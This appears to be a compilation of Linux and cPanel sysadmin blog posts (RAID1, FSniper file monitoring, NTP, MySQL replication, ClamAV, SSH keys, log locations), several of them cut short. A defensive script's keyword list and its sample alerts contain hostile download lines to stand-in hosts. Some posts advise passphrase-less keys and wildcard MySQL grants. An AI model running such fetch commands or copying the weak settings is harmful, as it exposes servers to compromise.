Create RAID1 for New Hard Disks via SSH/Online

The following steps are how I set up RAID1 (mirrored disks) over SSH on my production server. What we need is 2 new HDDs with the same disk space, already plugged into the server. The variables are as below:

OS = CentOS 5.6 64bit
/dev/sdb = new hard disk #1
/dev/sdc = new hard disk #2
/dev/sdb1 = partition 1 hard disk #1
/dev/sdc1 = partition 1 hard disk #2
/dev/md1 = RAID1 partition after both disk mirrored
/home2 = mount point for RAID1

1. Review the information about total space and available space on a file system:

[root@centos ~] df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/mapper/VolGroup00-LogVol00
47G  3.3G   41G   8% /
/dev/sda1              99M   13M   81M  14% /boot
tmpfs                 249M     0  249M   0% /dev/shm

2. Review the disk information detected in the system. Make sure /dev/sdb and /dev/sdc are in the list:

[root@centos ~] fdisk -l
 
Disk /dev/sda: 53.6 GB, 53687091200 bytes
255 heads, 63 sectors/track, 6527 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
 
Device Boot      Start         End      Blocks   Id  System
/dev/sda1   *           1          13      104391   83  Linux
/dev/sda2              14        6527    52323705   8e  Linux LVM
 
Disk /dev/sdb: 21.4 GB, 21474836480 bytes
255 heads, 63 sectors/track, 2610 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
 
Disk /dev/sdb doesn't contain a valid partition table
 
Disk /dev/sdc: 21.4 GB, 21474836480 bytes
255 heads, 63 sectors/track, 2610 cylinders
Units = cylinders of 16065 * 512 = 8225280 bytes
 
Disk /dev/sdc doesn't contain a valid partition table

3. Install mdadm via yum:

yum install mdadm -y


Detect New Files and Send Notification if Suspicious

This post requires Fsniper to be installed and running on your box. Please see the following post: FSniper – Monitor Newly Created Files in Directory. This is similar to the popular paid ConfigServer eXploit Scanner (cxs), which also uses the inotify functionality available since kernel 2.6.13.

I use Fsniper to detect new files and let its handler trigger the following script. The script logs every new file captured by FSniper to /var/www/html/new_files.txt (so I can browse the list in a web browser at http://yourwebsite.com/new_files.txt) and then notifies me whenever it finds any of these suspicious words inside a file:
wget, curl, lynx, gcc, perl, sh, cd, mkdir, touch, base64

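#!/bin/bash
# Handler invoked by fsniper; $1 is the path of the newly created file.
file="$1"
# Log file sits under the web root so it can be viewed in a browser
# (restrict access to it if the paths and owners are sensitive).
output_file='/var/www/html/new_files.txt'
# stat is safer than parsing ls output (file names may contain spaces)
user_owner=$(stat -c '%U' -- "$file")
ip=$(hostname -i)
subject='Found something suspicious'
emailto='[email protected]'
# mktemp avoids a predictable file name in /tmp
message=$(mktemp /tmp/emailmessage.XXXXXX)
# Plain substrings: 'sh' and 'cd' also match inside longer words
pattern='(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64)'
 
# Log every new file: date, time, path and owner
echo "$(date +"%Y-%m-%d") $(date +%k:%M) >> $file | $user_owner" >> "$output_file"
 
# Count the lines that contain any of the suspicious words
danger=$(grep -EiH -- "$pattern" "$file" | wc -l)
 
if [ "$danger" -gt 0 ]; then
    echo "Server: $(hostname)" > "$message"
    grep -EiH -- "$pattern" "$file" >> "$message"
    mail -s "$ip | $subject" "$emailto" < "$message"
fi
rm -f "$message"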

The email you receive will look similar to this:

From: root
To: [email protected]
Subject: 192.168.1.1 | Found something suspicious
Email Body:
 
Server: hostname.myserver.domain.tld
/home/user/public_html/test3.php:wget http://192.168.0.100/bad_thing.php
/home/user/public_html/test3.php:curl http://hackers.tld/scripts

This will help you monitor any changed files and make sure you are the first to know if a new file contains unwanted words. You can modify the script to suit your needs.
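
The handler's pattern matches its words anywhere in a line, so short entries such as sh and cd also fire inside words like "flush" or "abcd". The block below is an added example (not part of the original post or of FSniper) that compares that substring match with a whole-word match over the same word list; the function names and the sample files are constructed for illustration.

```bash
#!/bin/bash
# Added example, not the post's script. Function names are hypothetical.
WORDS='wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch|base64'   # list from the post

# Lines matching the post's pattern: words match anywhere, even inside others.
count_substring() {
    grep -Eic -- "($WORDS)" "$1" || true    # grep exits 1 on zero matches
}

# Lines where a listed word appears as a whole word (-w).
count_word() {
    grep -Eiwc -- "($WORDS)" "$1" || true
}

# Print an alert line only when whole-word matching finds something.
triage() {
    hits=$(count_word "$1")
    if [ "$hits" -gt 0 ]; then
        echo "ALERT $1 ($hits lines)"
    else
        echo "ok $1"
    fi
}

# Constructed sample files (not real uploads).
SAMPLES=$(mktemp -d)
trap 'rm -rf "$SAMPLES"' EXIT

cat > "$SAMPLES/benign.php" <<'EOF'
<?php
$title = "Publisher dashboard";
$code  = "abcd-1234";
flush();
EOF

# Content taken from the sample e-mail shown in the post.
cat > "$SAMPLES/test3.php" <<'EOF'
<?php
wget http://192.168.0.100/bad_thing.php
curl http://hackers.tld/scripts
EOF

for f in "$SAMPLES"/*.php; do
    echo "$(basename "$f"): substring=$(count_substring "$f") word=$(count_word "$f")"
    triage "$f"
done
```

On the benign sample the substring pattern flags three lines and the whole-word pattern none, while both flag the same two lines in test3.php.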

FSniper – Monitor Newly Created Files in Directory

Fsniper is a good utility that waits for a file to be changed, then executes a command on that file. This means that whenever new files are created, we can do something with them, because fsniper returns the path and file name. From this, we can use the result to execute another task, like sending a notification or moving the files to a specific folder based on MIME type.

Examples of FSniper usage:

  1. Categorize newly created files into specified directories based on MIME type
  2. Notify the system administrator via email that new files have been created
  3. Move or delete unwanted files, based on extension, from the directory being watched
  4. Scan new files with ClamAV and send the results via email
  5. Much more that you can think of yourself

In this case, I am using the following variables:

Server OS: CentOS 5.6 64bit
Directory to be watched: /home/user/public_html
Files being monitored: Images and text files
Action to be taken: Output it to another text file with date, time and file owner

Log in to the server and do as follows:

1. Install dependencies via yum:

yum install pcre* file-libs file-devel -y
									

2. Download fsniper using wget. You can find the source at http://freshmeat.net/projects/fsniper :

wget http://projects.l3ib.org/fsniper/files/fsniper-1.3.1.tar.gz
									

3. Extract the downloaded files:

tar -xzf fsniper-1.3.1.tar.gz
									

4. Enter the directory, configure and install:

cd fsniper-*
./configure
make
make install
									

5. Fsniper is installed. Try to run it by executing following command:

fsniper --verbose
									

6. You will see an error telling you that it can't find the configuration file, so we need to build it. Stop the FSniper process by pressing Ctrl+C.

7. Create the config file under the /root/.config/fsniper/ directory:

touch /root/.config/fsniper/config
									


Setup NTP Server and Sync Time with Client

I will show you how to set up a time server and sync your client's time to it, for example when you want successful master/slave MySQL replication. Most replication or client/server services should have their time synced and identical to make sure there is no duplicate or backdated data.

In this case we will be using 2 servers. The variables are as follows:

Server1 = 192.168.1.1
Client1 = 192.168.1.2

Now we set up the NTP server on Server1:

1. Install NTP via yum:

yum install ntp -y
									

2. Enable the NTP service to start automatically on boot:

chkconfig ntpd on
									

3. Open /etc/ntp.conf in a text editor and add the following line:

restrict 192.168.1.0 mask 255.255.255.0
									

4. Save the file and allow port 123 through your iptables firewall:

iptables -A INPUT -s 192.168.1.0/24 -m state --state NEW -p udp --dport 123 -j ACCEPT
									

5. Start NTP service:

service ntpd start
									

Now we need to configure Client1 to sync time with our NTP server. Log in to your client and do as follows:

1. Install NTP service:

yum install ntp -y
									

2. Sync the time with Server1:

ntpdate -u 192.168.1.1
									

3. Start the NTP service:

service ntpd start
									

4. Verify the synchronization with command date:

date
									

The Best Way to Setup MySQL Replication

In this case, I have 2 servers installed with MySQL 5 and running CentOS 5. Assume Server1 is the master server and currently hosts a database called db1, and Server2 is the slave server and has nothing inside.

Variables used in this case:

Server1 IP=192.168.1.1
Server2 IP=192.168.1.2
Database name=db1
Replication user=replicator
Replication user password=slavepass

We configure Server1 first. Log in to the server and do the following:

1. Log in to Server1, open the MySQL configuration file, /etc/my.cnf, and add the following lines under the [mysqld] section:

[mysqld]
server-id=100
log-bin=master-bin
									

2. Restart MySQL:

service mysqld restart
									

3. Create a user account that the slave can use to connect to this master server:

mysql> GRANT REPLICATION SLAVE on *.* to 'replicator'@'%' IDENTIFIED BY 'slavepass';
									

4. Dump the database so we can bring the database to the slave server:

mysqldump -u[root] -p[password] --master-data --single-transaction db1 > db1.sql
									


Debian/Ubuntu – Make SSH Terminal Run with Colors

Those who are used to having colors in an SSH terminal session will surely find it weird to SSH into Debian/Ubuntu because, by default, the terminal session will NOT run in color-enabled mode. It might be a small issue, but being able to see and differentiate things by color helps a lot when administering and managing the Linux box.

What you need to do is put the following content into the /root/.bashrc or /home/any_user/.bashrc file (this is actually an extended version with some tweaks for your .bashrc file to enable colors):


cPanel – Update ClamAV

If you are facing the error below when running clamscan, especially in cPanel:

LibClamAV Warning: ***********************************************************
LibClamAV Warning: *** This version of the ClamAV engine is outdated. ***
LibClamAV Warning: *** DON'T PANIC! Read http://www.clamav.net/support/faq ***
LibClamAV Warning: ***********************************************************
									


This means a new stable ClamAV version has been released and you are recommended to upgrade. Below are the steps to follow:

1. Download the latest stable version of ClamAV by going to http://www.clamav.net/download/sources

wget http://downloads.sourceforge.net/clamav/clamav-0.97.1.tar.gz
									

2. Extract the downloaded file:

tar -xzf clamav-*
									

3. Compile the sources:

cd clamav-*
if [ -d "/usr/lib64" ]; then libdir="--libdir=/usr/lib64" ; fi ; ./configure --prefix=/usr $libdir --sysconfdir=/etc --disable-ipv6 --disable-zlib-vcheck
make
make install
									

4. Update virus definitions:

freshclam
									

Public Key for SSH Authentication

Password-less SSH can really help a server administrator when accessing one node from another. This is possible by setting up a public key for SSH authentication on the source and destination servers.

1. Create your public and private key pair by typing:

ssh-keygen -t dsa
									

2. The key generator will ask you where you want to save your key. Press Enter to accept the default.

3. Next, the generator will prompt you to enter a passphrase. Press Enter without entering a passphrase. (You must leave this blank so that the destination server does not prompt for anything when authenticating the SSH user.)

You will need to copy your public key to your destination server. Do this by entering the following command (you will need to enter your password just this one time after you press Enter):

ssh-copy-id -i ~/.ssh/id_dsa user@serverIP
									

*user = the username of your destination server
*serverIP = the IP address of your destination server

Test your setup by entering: ssh user@serverIP. If you've set this up correctly, you shouldn't have to enter any login details, and you are now ready to connect to the destination server without the hassle of remembering the password.

WHM/Cpanel Logs in Details

cPanel/WHM Initial Installation Errors:
Location : /var/log/cpanel*install*
Description : These log files contain cPanel installation logs & should be referenced first for any issues resulting from new cPanel installations.

—————————————————————————

Cpanel/WHM Accounting Logs:
Location : /var/cpanel/accounting.log
Description : Contains a list of accounting functions performed through WHM, including account removal and creation.

—————————————————————————

Cpanel/WHM Service Status Logs:
Location : /var/log/chkservd.log
Description : The service monitoring daemon (chkservd) logs all service checks here. Failed services are represented with a [-] and active services are represented by [+].

—————————————————————————

cPanel error logs:
Location : /usr/local/cpanel/logs/error_log
Description : cPanel logs any error it incurs here. This should be checked when you encounter errors or strange behavior in cPanel/WHM.

—————————————————————————

cPanel License Error Logs:
Location : /usr/local/cpanel/logs/license_log
Description : All license update attempts are logged here. If you run into any errors related to license when logging in, check here.

—————————————————————————

Stats Daemon Logs:
Location : /usr/local/cpanel/logs/stats_log
Description : The stats daemon (cpanellogd) logs the output from all stats generators (Awstats, Webalizer, Analog) here.

—————————————————————————

Client Information, Requested URL Logs:
Location : /usr/local/cpanel/logs/access_log
Description : General information related to cPanel access requests is logged here.

—————————————————————————

cPanel/WHM Update Logs:
Location : /var/cpanel/updatelogs/update-[TIMESTAMP].log
Description : Contains all output from each cPanel update [upcp]. It’s named with the timestamp at which the upcp process was initiated.

—————————————————————————

Bandwidth Logs:
Location : /var/cpanel/bandwidth
Description : Files contain a list of the bandwidth history for each account. Each named after their respective user.

—————————————————————————

Tailwatchd [New]:
Location : /usr/local/cpanel/logs/tailwatchd_log
Description : Logs for daemons configured under tailwatchd, i.e. cPBandwd, Eximstats, Antirelayd.

—————————————————————————

Apache Logs:

General Error and Auditing Logs:
Location : /usr/local/apache/logs/error_log
Description : All exceptions caught by httpd along with standard error output from CGI applications are logged here.
This is the first place you should look when httpd crashes or you get errors when accessing a website.


Shrink MSSQL Database Transaction Logs

Have you ever encountered this problem when managing MSSQL databases: the transaction logs eat up your hard disk because you did not initially configure a limit on their growth? When you see this kind of problem, you can shrink the transaction log and then change the growth limit using MSSQL Management Studio.

1. Open MSSQL Management Studio

2. Open the SQL command window and enter the following lines

USE <DatabaseName>
GO
DBCC SHRINKFILE(<TransactionLogName>, 1)
BACKUP LOG <DatabaseName> WITH TRUNCATE_ONLY
DBCC SHRINKFILE(<TransactionLogName>, 1)
GO
									

Replace <DatabaseName> and <TransactionLogName> with the respective values and execute the SQL. Your transaction logs will now be shrunk and you will save a lot of disk space. Do not forget to take the preventive action afterwards!

User Manual: cPanel + WHM in PDF

cPanel is no doubt well known among Linux hosting control panels. It has good online documentation, active communities (especially in the forum) and reliable technical/sales support. But we can hardly find the documentation in a PDF version that is downloadable and can be printed out as a book.

Here I share the cPanel and WHM user manuals with you. I found these somewhere on the Internet but I can't remember which site I got them from (sorry for not crediting the author). You can click the following links to download:

cPanel_11_User_Manual – 402 KB – 189 pages

WHM_Administrator_Manual – 1.01 MB – 352 pages

Note: It is not as up to date as the latest version

Installation – Standalone Spam Assassin Server

This is my way of installing a dedicated Spam Assassin server to be integrated with my internal mail server. This server is better run as a virtual machine, because deployment is easy and it does not need heavy resources (depending on how many spam processes you want it to run). In this case, we will use CentOS 5.5 64bit.

1. Install the required RPMs

yum install -y db4 db4-devel gcc libstdc++ libstdc++-devel

2. Update kernel, and others

yum update kernel
yum update

3. Reboot

4. Open Perl shell and install required perl modules

perl -MCPAN -e shell

(for first time user, you might need to accept default value if prompted)

install HTML::Parser
install NetAddr::IP
install Net::DNS::Resolver::Programmable
install Net::Ident
install Net::DNS
install DB_File
install Digest::SHA1
install Time::HiRes
install MIME::Base64
install Getopt::Long
install File::Copy
install Mail::SPF
install Mail::SPF::Query
install Mail::DKIM
install IP::Country
install IO::Socket::INET6
install IO::Socket::SSL
install Compress::Zlib
install LWP::UserAgent
install HTTP::Date
install Archive::Tar
install IO::Zlib
install Encode::Detect
install URI::Escape
